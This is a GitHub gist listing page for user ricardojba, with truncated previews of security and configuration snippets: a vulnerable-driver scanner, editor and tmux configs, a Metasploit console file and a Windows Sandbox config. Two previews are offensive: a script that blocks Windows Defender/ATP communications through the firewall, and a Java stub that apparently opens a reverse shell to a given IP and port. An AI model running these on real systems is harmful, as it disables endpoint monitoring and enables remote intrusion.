Ricardo ricardojba
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Powershell Core 7.3.6 tested | |
| $lolDriversUri = 'https://www.loldrivers.io/api/drivers.json' | |
| "Fetching loldriver list as json from $lolDriversUri" | |
| $response = Invoke-RestMethod -Uri $lolDriversUri | |
| $jsonObject = ConvertFrom-Json $response -AsHashTable | |
| #Write-Host $jsonObject.Tags | |
| "Obtained driver list from loldrivers.io, count is $($jsonObject.Count)" | |
| "Scanning $scanPath for drivers (*.sys)" | |
| $scanPath = "$env:windir\System32" | |
| $driverList = Get-ChildItem -Path $scanPath -Recurse -Filter "*.sys" -ErrorAction SilentlyContinue | Select-Object Name, FullName |
ricardojba
/ atp-fw-block.ps1
Created
July 16, 2023 19:59
Block All Windows Defender/ATP Comms via FW (Privileged)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-proxy-internet?view=o365-worldwide#enable-access-to-microsoft-defender-atp-service-urls-in-the-proxy-server | |
| # https://download.microsoft.com/download/6/b/f/6bfff670-47c3-4e45-b01b-64a2610eaefa/mde-urls-commercial.xlsx | |
| # https://download.microsoft.com/download/6/a/0/6a041da5-c43b-4f17-8167-79dfdc10507f/mde-urls-gov.xlsx | |
| $MSATPURLs = "automatedirstrffusgt.blob.core.usgovcloudapi.net","automatedirstrffusgv.blob.core.usgovcloudapi.net","automatedirstrfmusmt.blob.core.usgovcloudapi.net","automatedirstrfmusmv.blob.core.usgovcloudapi.net","automatedirstrprdcus.blob.core.windows.net","automatedirstrprdcus3.blob.core.windows.net","automatedirstrprdeus.blob.core.windows.net","automatedirstrprdeus3.blob.core.windows.net","automatedirstrprdneu.blob.core.windows.net","automatedirstrprdneu3.blob.core.windows.net","automatedirstrprduks.blob.core.windows.net","automatedirstrprdukw.blob.core.windows.net","automatedirstrprdweu.blob.core.wind |
ricardojba
/ unixsock-sniff.sh
Created
March 10, 2023 10:03
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env bash | |
| # https://gist.githubusercontent.com/ranjithum/274b921eed36d2e98c204f43aaf53ca3/raw/8a3c8d875a88416306be46e376bc485af0a76f49/unix-shark | |
| # https://mivehind.net/2018/04/20/sniffing-unix-domain-sockets/ | |
| # https://www.humbug.in/2013/sniffing-unix-domain-sockets/ | |
| # https://pypi.org/project/unixdump/ | |
| # https://github.com/mechpen/sockdump | |
| _usage() | |
| { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Show hidden characters
| { | |
| "color_scheme": "Monokai.sublime-color-scheme", | |
| "word_wrap": true, | |
| "show_encoding": true, | |
| "highlight_line": true, | |
| "font_options": ["subpixel_antialias"], | |
| "auto_complete_commit_on_tab": true, | |
| "ensure_newline_at_eof_on_save": true, | |
| "highlight_modified_tabs": true, | |
| "trim_trailing_white_space_on_save": true, |
ricardojba
/ vimrc
Last active
January 17, 2024 12:32
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| syntax on | |
| set nomodeline | |
| "set backup | |
| "set backupdir=~/.vim/backups " centralized backups | |
| "set directory=~/.vim/swaps " centralized swaps | |
| "set undodir=~/.vim/undo " centralized undo history | |
| set fileformats=unix,dos,mac | |
| set number " enable line numbers | |
| set numberwidth=5 | |
| filetype plugin indent on |
ricardojba
/ tmux.conf
Last active
February 27, 2023 22:31
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| set -g base-index 1 | |
| set -g pane-base-index 1 | |
| set -g default-terminal "screen-256color" | |
| set -g history-limit 100000 | |
| set-window-option -g automatic-rename off | |
| set-option -g set-titles off | |
| bind r source-file ~/.tmux.conf | |
| set-option -g mouse on | |
| set -g mouse on | |
| set -g xterm-keys on |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # -*- mode: ruby -*- | |
| # vi: set ft=ruby : | |
| # All Vagrant configuration is done below. The "2" in Vagrant.configure | |
| # configures the configuration version (we support older styles for | |
| # backwards compatibility). Please don't change it unless you know what | |
| # you're doing. | |
| Vagrant.configure("2") do |config| | |
| unless Vagrant.has_plugin?("vagrant-disksize") |
ricardojba
/ msfconsole.rc
Last active
February 26, 2024 22:54
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| set LogLevel 5 | |
| set ConsoleLogging true | |
| set SessionLogging true | |
| set TimestampOutput true | |
| features set dns_feature true | |
| features set postgres_session_type true | |
| features set mssql_session_type true | |
| features set mysql_session_type true | |
| features set wrapped_tables true | |
| features set fully_interactive_shells true |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // javac C.java | |
| // java C <ip> <port> | |
| // https://gist.github.com/caseydunham/53eb8503efad39b83633961f12441af0 | |
| import java.io.IOException; | |
| import java.io.InputStream; | |
| import java.io.OutputStream; | |
| import java.net.Socket; | |
| public class C { | |
| public static void main(String[] args) throws Exception { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!-- https://github.com/ealtili/Blog/blob/master/WindowsSandbox.md --> | |
| <!-- https://github.com/microsoft/Windows-Sandbox-Utilities --> | |
| <!-- https://github.com/damienvanrobaeys/Run-in-Sandbox --> | |
| <!-- http://www.systanddeploy.com/2019/06/run-file-in-windows-sandbox-from-right.html --> | |
| <!-- http://www.systanddeploy.com/2019/07/windows-sandbox-editor-update.html --> | |
| <Configuration> | |
| <VGpu>Default</VGpu> | |
| <Networking>Default</Networking> | |
| <MappedFolders> | |
| <MappedFolder> |
NewerOlder